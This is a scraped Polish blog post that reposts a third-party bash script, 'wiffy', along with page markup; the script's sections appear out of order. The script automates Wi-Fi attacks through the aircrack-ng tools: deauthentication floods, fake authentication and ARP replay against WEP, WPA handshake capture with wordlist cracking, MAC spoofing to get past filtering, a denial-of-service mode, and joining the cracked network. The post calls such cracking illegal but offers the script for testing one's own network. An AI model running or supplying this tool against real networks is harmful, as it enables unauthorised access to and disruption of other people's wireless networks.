-z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0001.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error 